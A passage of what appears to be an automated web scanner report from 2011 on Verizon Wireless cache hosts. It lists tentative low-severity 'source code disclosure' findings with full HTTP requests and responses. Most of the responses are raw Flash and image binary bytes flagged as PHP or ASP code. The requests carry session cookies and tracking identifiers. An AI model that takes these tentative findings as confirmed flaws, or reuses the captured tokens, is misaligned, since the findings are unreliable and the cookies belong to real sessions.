Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 27 Jul 2011 06:28:59 GMT
Accept-Ranges: bytes
Content-Length: 112736
Content-Type: application/javascript
Cache-Control: max-age=86400
Date: Mon, 05 Sep 2011 22:35:58 GMT
Connection: close
Vary: Accept-Encoding

var _lastActivityDate=new Date();function checkSessionActivity(){var c=new Date();var a=0;c.setTime(Math.abs((new Date()).getTime()-_lastActivityDate.getTime()));a=Math.floor(c.getTime()/(1000*60));va
...[SNIP]...
ow.movedownvar){clearTimeout(movedownvar)}}function wsMovetop(){wsStopscroll();wsCrossobj.style.top=0+"px"}function wsGetcontent_height(){wsContentheight=2880}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.html","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}wsGetcontent_height();function reload(){return}function closeAllDiv(a){try{if((a=="mp
...[SNIP]...
tyle.zIndex="-1";a.style.display="none"}if(document.getElementById("searchHeaderText")!=null){document.getElementById("searchHeaderText").focus()}return false}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}function contentDisplay(d,c,f,a){var e;if(c!=null&&c!=""&&a=="href"){e=c}else{e=d}e=e+"&r
...[SNIP]...

12.2. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 55680
ETag: "d980-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:56 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................Exif..II*.................Ducky.......L.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................
       ......................................................................................r..........................................    .
...[SNIP]...

12.3. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 47236
ETag: "b884-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:58 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................    ...    .......

.

..........................................................................................................r..........................................    .
...[SNIP]...

12.4. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2011 16:28:47 GMT
Content-Length: 57837
ETag: "e1ed-4e5d0fbf"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:59 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................JFIF.............C..........
.    ......    ....
...............
   ..........
...[SNIP]...
<.&Y...x...H...<%..;j...9.Sa&?.Z.?.\...Q...\..O..C.>.X..S..Y.......N.}....yuE......YN..k.|....pBc}.O..~....K..tK.:tp.v.c8..X;0.^.Z9...0.u.fX..U.b7z
.....i.I*W.2.o...v    u....6...v.......W.}..N.z......!.?.A.._5.S,}b.%k........Va....e..+..;O..'..l.T..ja...Z<.C.T...=Z.........K.eS.uM.g.c.@?@....%u*..Jt.I...5...d....=.2
.M..u>.]..u;.\0..OgR..kf.qI...q.........nmog#...0.l..L..S^7..t.8..;m..3.`l.k.....e....Xx..R...J....T5.........D.B.....j..u1L_....K6`..n.R..5.{J.x{.0....:.O..9,[.m:f...\Z..................6|Vs\u.Z..1mi.B.k...vV..pi}.f.....#.....6S.w"..j[...E..hq.c...Z...`/..eT...v..y -.....Xw.......E..4.W..$i.4.....P.a........&.).]&t..~.....'i.[<..t_V.).u..........:,.K........JY]\.......N.._U.....,..+.1.i..^$8{..^.q.....&8..6.S.......u......{.r......d.u...h....-b....<.$.$..isi....W5G..BL..... ..(f.......+...z......u.phY..h..m....4...D.s..9/...8p..d....*..."...q.T<..d.U...(.l.6...]..........l..=.;...N....>    ^.k...[.........    ..-i._|...E..f.....4.A.Y.{.......3...<.Q....P...#..x..~..b.4..U....`t.%.q..z.....Z..'....d..kLH<...w.d...r_K>9...].zml.6.........G........?K/.|..h&;.h...%...p.f....../a...)..-....o.G.G.r..".Z..<...J.]?.c...h....j.S.o......TN.....L.<./.'a.*.T.A3.H.......e..w%..gm....C.|P.A.`y... ..v...,.F.J...M...........%O..........k.;..y.6..z.i4.],..94.U.j....mgI ......1..T.......nC..nv......G".9..F.).......p.5.f.....9.B..0=]..).H... \.:....@.7....=]#M........n...qV.......[.....mf..i...=!x.....{4u:......G.Y8.Z.o..]..^.........l4.E...;........}....r.(.u.S........u...C.:.'..bK..t.$.....Z..V.S..}w:.......h..k{..;..&...v].7XE.G.r...v..m'.....O....hN....A ....#b7..k...A.r..t..#...m.?x..~....D...w.U..8..V..#..+>...|%.}...._..G..K.....)......qh...S...j..X...Y...lk.a.N#f.{.3....v..{.yR.OT$..A. .y"X4...............>,B...:sG ..p.I.......@.6...Zg....vWU........P:R.F.& It....l../i.../.YNr.$...nJ..S...+<[..ls.....P.9@.'RV.U$............7(..5UsW*....    m@....>'Ec...Oj.Gh...6.d..T....)....l.'....l.+..G.....*e.....1.....u...R....)...2\u..../..^V..eKw...s.0..r..u...{[.V...._..`..*9....    2..    .],.I*i<7.VS....J.J.....np?...iN...K.u.<)\ws.....8"9.....S..&A..1#O4.}.....u$n'.c.y%1....z..|.-.P.7.@.D.T$&....#p.Y.sJH.{#.M...:...P'.d..R...b..!..' (@..T.uG...2..>=.../ra....0{..T...dl.......a.L
@.$. ..)@FP(..d@@4.!.......r.)....%5F..P0.....Gs.U.{'t*.@.Q...w..
..P..`..{~j...o%sGD..D.0..o.S....g......%...{.8c`....}%2.[.......>.)..as..11;.E...<.y#......X...."...q.
0.:.0.?WOw.T..`A.:..h...L............<.CG..yx.tX......w....t.."........N..=.S...,.Qp.R..k`w........<..-..9..K.....n...V$.........._ ..=V.G....>....-v.rRw..LsW....y.J...Td..B..xP.l....Eu..+KwT.NF.....j....r...'U..t=&........a|O..h1._.:.t..........$s]...:.-..f..Z7..h.T......7...<.`}&....-..X....3.{3...J..c^S...0.-.}..e.jm......q2GmqA.....;...v....\!....#o.........8w.F..oD.O..{.*V.|...<..8....
\\....V..t(U.~..&...[..X..w.|......W..W...ukB....V.n4.c.{{.U.oi7.K7.eO...To.*.4.-......9BL.XvW....u9.7wvn..Z..L.[.?N...v.{gZU...-:.Y.{...&.G.....`...........MHuF.W......M.M.}gF..[..M........>.8|....^...6y'.E....\..........L....x.uo.|y...'(~.Px.b.....s.w+..D.Wa.x...%.]S..J......u....$...d....*T..[..G`..R.......4#_.k..a...e:W%..K....f..].s.}..R..AM..vV...<..W..x...............2D...A..^\...un.>.s.R...t.0.....;m.Y.k.$....C...a.S.e'.[
...A..    ....B{......M../.X.b.R...s.`...I.`h$._.P..J...v-.CN..Q.N..c......vX.....E....../\...OM|>.C.^..Ki.41.4...zq.Z.m;...E6F././....B>j..Dw.>...=.B..g....>..n2..k{..h.kV.*....;V..bD.#~K`'.|......q..,.wt.>.. =.%...s..5../.Lw...Y.{.....:...].EIy5......;......LW...../X.A..................>...VO.b....>C&..s.W.;-.......F.^]}.....r.\..Lm9^...p.'.'.{....u....H5?..9..........k..........m.N.&.......LI...^G.b..|)...=..{kj...c.k.[....:..+.i%.%u.g...    ,.'.f..,.s.....^.#..dt=...j..M..F1....5..}Q..+....&.go..p?..K.g...}?-..+k............Bg^}.........8K..@|X....=......0.vI...R=..z....K.O.3i.WV..M......^.......9...'Gm.\..8._U}......
..........v...m,.......R..W..z...8.....f.li.9..;G7..@;.g^KP....K...J-t.^B....M.U...ga..\.^...8O...w.W3a].."{7;@........a.{Z.......H!.g....v....|....Tlk2....5...:.nq..`..#...m)D.5..G..i..]...V.=..".....*..c)..L.0d..(....#.]C....j......\....*....i...c+O...;..X......k./....t..6.T./#FIa.....z.....[.......c.m#..._...K.w..9...%.=..|.......]....p....n:?....i]Rxi..wh    >.ur .Y@c.{..E1...u....u.I....x.y....'1.Hk.=NU.....;l.9....T|..xf....)(.qJ...K[.u.@....[..%.Y&]..-....f......U..Wi.b.`xv......}nd..ok
.w..;..'..J......e.z.... ...c.K.F..+..J...a..[.U?....b...2's.[..S.x.........j....e.c./4z..t.-...G..k;nQ:t..lF.(...h.lB...$..;(..:j!@.vp.....x.0qlF...5/...$..$........[........V..]N....=..]..9-...0K.Y.\...kn..m..Z..1.......1p .y.\..O>......YF94.....t....i_...v...R .h..I#.    .....zG.T...7i.....M7ys....H];.1.6...w4Q..W){..\..,?.....m./...=[#.......j.X.
..M
..k...{&..jA....h......g..I.......[>.|.J.|.X.].{{F2.........z.@#..y...].]...i.M....Z>t~..2....&.R......E.......+.a.Y.?.............T......P.....+.J....!.;..fgd2.(
...S..-1.=R....r.!.....5(..Q.4L.fuQ...#.5.t...7...@....Q...]P....a..y........3g.....I...(;.
F...$B0.=..".......<z#. "(...T.<.;"P#O..    .TwV..B..
..T.J.....UpS. /i..
.........R.......~'f...V,qn.5\..@...r.....q...........z'.Z..s4.#x+.o...3.}............Z....5.P5=Tr.Xv. ........c7.w.....G.A..CGy...t.NXH..ZcX....dzl.sI....?%.).5-x.}.&......@9;k;.........=. 4..H ..V....:.AD........vRg..^...c......-#'].y3{.m.77X.Y.T..|?.{*<..mV..q.2......3.....W.s*:.Kf....q+F8G.\.=......q4.Fii...Ek...-{.C....e....=.,m)f....|.K-..L.A..::.f..<Uy}..m;...:.....\.m..~.....G.B.8..q.:G;.4..P^...;.,nh.:.......-3...'.U..*.V...b..i....9d....uO....gg..9.$...].9?#3...U.S..0s..}...mC...0..a...r.uK;.[...6..P..H..5/L../.f.M........wa...........J...?Od.......W.'.lt....k.k..B.......H.5.{.....5K.F#G...1....I.2..C.?..Ow.V.;.6...jY\Ski...j...q.scW1.Q...=.<.Vc..NK.Z,..... ..
...........v4.hg...[..@\..w._..n7C...v:..t..%.q...e..v..c.t^_.zJ...>...6>.M....Z...O.KH..V..X.lg......k....5........fwy0..'[..*.Go!..zV.RI.]e0x.5q.?.n$.[..n....T...[..F..7....]P    .Z...&.c..7...R..}.Z.....Q..k...Rp......*6.....y.Lz...@>..
..WZ..p.$..~$.{.%i...y.c.(...Z...iu.........^.>...qM......)P.`.w7eh..^k.q.H..&........y\.0B...8......^...[..$H..~...&.c...<j...-.^=......s........    .V.U.......;....%N...............*.w......n'..@..r......|..oL..qw..1..n_....3....^..0.L....[...B.Z.v....
.r.3>..G...4.....w.+.-s.v....,f.^...@.w.DZh.]L...$j.=....b........z..c.......]w8..H...x.........t..)......;..@..P..w#&.w[..R..(..]..T.......K.ugkZ.vw..........W.$.......zV...0K..V...Za..kM 3.l$....:N.....IJ.hy.j,\...U\\..............p..H.....w.....3    .6.5f.P}..M....]..4.....k.k.......q.4+.Z.....5.....kU..DNg4o.o.J...<nKa>......u.......3.3 .%}#..Dj...'7..kd...YL.F^GN...>..;./.Wn.1..&..&.|6.3Y.....:...,ff..z.W..b.v.3.a...-k[7....5.-.ylCA..c.h.!.oE.`........'......H.r.e.P..d.`.{......mp\B......G......WTh..=)9.H....]...'\S..w/.x<.QyU.3Wf...k.u....e.y.....A.A^......o.s....Y...]...Y..vP.......bv.......q'..J......eK.{_.....mGi.GM.9..4)o~..zum^..j...j.W9.^..=....iavu+.9...T......9..j..uvT..b....s.i....$.*X=...kMW.:....?.l......x..1`....Sev.N#q..D....A..5........l.1....$.:.[.J....U:..R.....:u....y.s...0=.z1~..}.T.............V.....4...P..?.vq.4.....>
>.....\I.N..%)&g~.V.NS...:.6Y2.......0e....7.L......$........#t...7..q.............D..*......=Kw.a.P....-..............F.....x[..!N....|....;P...P....],...>....#..i.sm.-.wk....8!......>..A....[..&v.i.GS.....q..3..T.X4...v]..z4...4s.....v+N.......d..%...x......o.>.'?..*....h...7...J..\a.htN............raSh.dO.q...y.p..a..d.]W=.. U...au.u..-.\.A.s>Epj!..@....i.4...Wy.[N...c{:t..a..U..k.@5]<..$.....%..KL....K..g...2...9m!X.....e.{..X....I..I......q.u0@.[..y.8.J.6..uk.4+=.6.*.    .k    ....p.I.9.>d..x............Y..`...Wht..)..q.8A.|>k..:.+UOw........s.6... .t...z...Sk...?.V.5<..}.L.......[........K....`i.Tph...s.@0:-{....k...-.}l..q.s.w:&.ls.....yF..KjR.Q.....23?..B.n}%P.au.zN.v./m'.sZ."O.3...9...|.&..9.(..S.Z.....4......=..4{Zp!.^k..|e}.X......S.K[...v`7...i./....@.. H..'O..........;>..y.\..v.....M.....]...jS{-.....I......U..u1.3.
..u^..Q.c.....d..o...._wU.l.:..s..m....[N...Q..B.y9..?...Iv.G.r.i..$Z..=...,f.EL..ovq...{.?...qkZV...\.j..j.....7.7^}Q.z..l.w..%:.d:.-s....t#..
b.Ky..-..'F..t.8i....oV......+....C=Q..GPw<.k_L.....&5...._;T.....jF.>..g.D..?.....^..V...g%..c.t.A]..aw...z1.7..{.4U....B......r./.E.;....u..^.6.@... ..2..x..1G9..n.I3.N.3.TG2=.i....:q.p.F.....j...Lw..6..p..f...5.\........|.m.W..)...M.n..u$.....$;.%w...wvv.....Sk...y..@.d.......Md.OT...RRJ...%..1..&..=....d.......B[.,..#.uHu...y%-i.P.Ds
GB.kz..!..nP
A........@.P..tS)    .............vD............&..@.......... H....3&...e.T......AL...    Dm..T.%.5..J..5.P.....$&.E.e..B..HJ1..j.....GU...
GsV.aVJ..FT..@..8@...kB.*.....p
d..P......8.*..2]...;Z.....    ^#..>+&.wW.Y.Nj.......{.'.L...T.w.:.$.i.l...i..|....3.]?..l.pp......`.5&..W.z..|m?*S}K...x.1..4...i:......0l.,c...,.U...E.VOC.qF.I3..2..-"v3......-.[}].pk.{.;..K....h..s.^`>...Rl...6u.'.qo.....}.U.V.F........*..W8h......s..s.(4.k....I......G..b.uN.d....:v..}#..pV#...K...g.%>A3.....q..^...k...6,.Qk......N...g.\N.m..V&F..LZD=.`n~..4.....%\.t.$......Q....9. ...$...D.*.m.A;.>
...[SNIP]...

12.5. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 60068
ETag: "eaa4-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:53 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................JFIF.............C...........    ........    ...        .....    ..    .....        ...    ........    ..
...[SNIP]...
.aN.
.grq>....5D.....P...@Z..D..A....*K.vn.
.Q......V......LUN.u...L..Q..Uf_....V.j'[Z.].k@.G...
..T)V.[Z.Qrj"ge.;.?..Q......m&*.................P'j...4.....L...............-.|(,....J..`..=....+.mX<%...g....`......}b.vS..z.
.<hT........x....G.6.............M.W..."....P1......`.......$b............^..;...P.......$".{*......mX<'
..@......}..M....X......    %.....;'.....[...Y..k......k."....F..}b.vT........Zb.......d{..i..............j.....j....g.2....Z.*.kX.c.*. .......{e....GO.X...e.)|*.e.....4.0....lGD.).....x.*z..Jmb.)....2.b....J."....0@^.s..@(..H..y"XkahU...\@)Uqf.i5Z...Ij.y%...:U......PnZ.Ji.E)..=..(.
..mTR....aPn%..,f....\T..DuO...M..%6..E.TA.U...P.Wf.].[.uV...Z..A..xX.....d^5).....;.mK..G..P.*...Ah.~...S..>.i....S...".].J......RP..LG.....j...&..8..........*.*..Z.*.k.......B.?...OW......P....A...[.
8C....#..D....r....Q..tn#...|>.0
...l;...t..i..r.v.mGt...........^...).X..m.....k..M..@..T.Z]....<.Q...uY...U..]W~V'.U+.)zC.U..f...6.hq.iO$e@)mU...?..P...5..H.>..........(.Z...I.-..;R..V.BT.$%[
.Z.(...U]W.b..S.9.X.......j..>....Y..p.2..#..
..?."8....B..*T.. .B..!.....(.t1z......j...&;.0@.....P{j..[+.T..
.b.../Y...
....m-........../*q.......q..@....O/U....R..TI.Hq.MK.D..dR..B........./..8K.Q.n.'^.D.|.)+....)...r...6.:.j#.|F(....Z. .(O.....ZX)..2.ge... z....b.+){.x...=...B.....!..=.<.).b.}..
...$".{%....[...4.d.=..F....b..gn.W
... ...A.C.E.H.I.K.L.M.N.O.P.R.S.T.U.W.Y........@............/.....C..>6.....C...3.....C..:6.....C..B6..+?.C..6.....C..?6.....C..>6.....C..C6..@B.C..=6..H?.C...3...?.C..M6.....C...6.....C..>6.....C...;.....C..6..P?.C..>6.....C..d>.....C.?.N.....ApexSans-Bold.Copyright (c) Thirstype, Inc. 2003-2007. All rights reserved....a.....wSH...&..Q...
......D.D...$.F.kW...Y..    .j..M..X..*cH........S..F/..7..b...Wr......./.U^.................a.............Apex Sans Medium.!.D.F...L.t.........U.v...y.!...V...V....    s    .    =
.
;...+.._....3.Q.....im.@.l2.B. d.`..1~.!.)2..
YJe.......,.....L.d)..C.&,............7j......
.Z..2.*.*L.h.......2.t..*.j...0ct*..../..R.+.....#.*A
.....m*.........p ....[A.A..Y....*>.&k.
..y.iR.(...q|TI.....PA*7.7.@(.....{..m.wU.E.\@.Ul..hE[e.^.WU{.]...U....UuPFU.'h.D..
Q.. ....<|{)..'...<..%.J.wbw.=V.vS{..<.........).i...."jz........<t...r..&..#.x.oR."........U.R...V....M...8
.B,.V.s4..V<.XD.T.!.L
Wj..eZ.Jt.T.BL^......
.".(.....M....n ...0@........?........f.o.i.+..@.b..P...

8....B..
.[.2k?..L..J...+`.......|.....s=*6l.Z...r..P.)U..r.jW .q.....i.L]WyUu].>_.T..U..eV.M.t.Ui.!vR.U.K,.L.W.3..,.Bl....U.2!$.6T..........-..}b.v^k..o    ..g
.......3x......a..f...z......y.W...f....Ra.T.O=..%..$F....T?.....P.X..^.\.y....[v.C..xY......^4.........RX.Q;%)....H.M..;R...$M..D.b.%[.3V.......P....e.....ge...Jz...^..B...G.!K....Pc...j..e...Hz......P..0I{.C.{.........-...J..e...f[.....I..dw../..@..!..a.m..)....2...*............c.R.d......s......%..^2rT.W....N...k.U.\.=..N....(S[....T......K.R_;.D........*S.&..R......&h.~.}.....x.T.9H}YA}M.....SG?....TX.%QQ.S.U1O..E..R\.C..].5.....,...Z.4.5*..+!.J...h.T...z..Q.j..Z.Ch..5..T.s..U......V.k...6..]..M...x.x...~.W....%.....|.(a.G.......u.>.0U0.E.............0..u...Z...h.........G$...t..}..}.sq0@....X...EA.=)...    cJP.*}...X......
..A:a..9.$.~.Rw.8.*..
.....
{....RK.
e.........D.>.....y..*.....~..w...:a..8A'....
...)....b.ov4.S..q=.TT.....".{/....6{y]..M.....U)....=V...8%.\..@....*.2]T2    `yEQQ...\.U+k.+.IJ....=s.H..V.b......'s...i....C.r
r@...
..#(....l.......OJ{...Qz.......UOC..)>...j.....(_...P.......yae@)J..g.wE.d6.U..9$..T..V...X0S....r.].S/U...4.aP.%....G.S.p.T.@.......=....T..53.U3XUD..U.f.j.[...9y........)f.(...L.r.I...........yG....s[#...>...l.......h............+...
.........H....C7X.!....v.T.........n....Wm...U..l
N..a.*...p.j. .h..a`....3Ii....aj:h3L...w=t..d.........{...*.......C!.........B....W......B&..F4%...r..*..@dK(.."...R.LZ1.X..%...*.F.K. ... D...Z..K.....8.3.......j....KV*..N..j.4O=O8.l6....
d..R..:Z...N../.S...@.LY......K.\..B....w. .0.i*e.....24p..N..t_..D..a...H..2..u.....!..s(...."...........n.#.{t.)...
^L..8..U*(#..    I.._.    S..V>.T...I..4.KI..U....v.6.j.    .H..H.3R.33H.............A..z....b.MU..I...M....FSg.e.!.5tv_....b..`z..r...)K....
V..9....M.R..qH........*$.+L.(.. *......^/.T.
.N.uQ;."bg....{J..
&. d)2.A6.JS..2...!......Y...)....~.l....B..d?bb.........*$.+L.(.. *.....~.Vk.......TN.............x.E.9#.S.V.w....5..Ra.M&....s......T.v ....L..G]..u.........\.0.........}....    '.q?.]..kyb.5...t..wE..)b....*L1r........x..P.O.Hd.Y.Q......I..4.nX.!........A..z....b.MU..I...M...piSG...3\.u....U...>....I..wt.,wF..)Z.....N.6.K... ....6.j.I...F.......@....j.h....*............*..d.^K........<..r`
..?..5b...!^.j.R...m.@\.....G...e=..`#.W.....UW.......,}.'.=.z.HYO...2zR#'.......!..T.@.?..I.8BY.R%.g.z. ....(..@..].."...e(.F%..S\..k.G..C!j..5...T.SY.V.W8Z..j.XY.R....`.S..58nT...\n...x......x........l<h...rDa..G].r.
_@
>.Z..u.S..P0.....N..0.z....2..u..
. .'......;.....A..h..    ...f.......)......f.....O...;.}...&..#..J:....P.....C4-0.gm....JG]....kR.Z.i4.L.Va.........|
..>.a......~.kw.`... .....R....)....1jb.$I..D.......Aw.2.,......*....    ...J@......*..<.Ja...]
.q...$.{.L0.GB
.t ..P.1....*b..9....ac!B)0...L*@T|.....`'.z.89..=......~.f..L...8..L.....rA.L...z.....
j.
.\B...?......z.1..B...w.P..T).%.K.=....m
@..<
......,.|....(%.....r....."...\,.{/...U@...Xl..a.;..R.......NH.371........e.._..3+P#)..2..
i.
..R.U...:.........z!.....y..NN..{...;..<...W.2...eOb..yv]..?..y..O......}..L-.fEz.....d@..dy....;UFE.k@......za....*2I..T...t...i.k.l#.V..........t.Q69J..."..J....
]...]..[n.G-..9J.(.*..J...,.k.........D..b&+..&..I*..'.`k.M..]....sg]+Uy.)...L....pU.Y....P.O..gU'Zp3M.Q.w....H]..h!...0s..C.b......qQ.S....#.f`.^..`....V...Sym.wF...Z..5.....m.`.(p...d.......\(.9(3....'......:*.......*..h,b.....T?....z.J.O....e..Hx... ..>.0@. ...0.1.2.G.H.I.P.V.W.a.b.c.d.e.f.g.h.i.l.m.n.o.p.r.s.t.u.w.y.z....M.....@............2.....C...6...>.C...;.....C...6.....C...B.....C...6..\?.C..k7.....C...6.....C...6.....C...6.....C...>.....B..K6.....B...3.....B..#?.....B...3.....B...7.....B..~3.....B..=6..^>.B...6.....B...6.....B..,6..T>.B..56..g>.B...3...>.B..K6.....B..86.....B...6.....B...7.....B...6..g>.B...6.....B...6.....B...6.....B.._6.....C.?.P.....ApexSans-Medium.Copyright (c) Thirstype, Inc. 2003-2007. All rights reserved..........p.J;.n#...    ......,.,.%3A.:.....*L.n..T..%n...'......I)...z.I-$.<b....0....f....KI)..........$jS'.....Og....Z{'.*.<..i.&..z........'......g.. {...j.@<.V.n(ry...$.!.J.U..y..
.(n....0.:..Og.(@<9.......Og..
...........;(v{    ...........D....D...    .`.....P..    ...............C`F.......m<..%1..U...@...Lb.$.....M..+.......    ....b.......
.`.3..p...k.m.l.w........
.....5.....:.......    ........Arial.......+.].5.............D..X.....^M...ji.+....T..X....{...C..k....z.D......}(..vS{.J.]..E;*.....FY.`..T5...Z9Y..8.`.T...s..K.7..YT.EP..M..L.....#
z........%>Ktv..>
...[SNIP]...

12.6. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
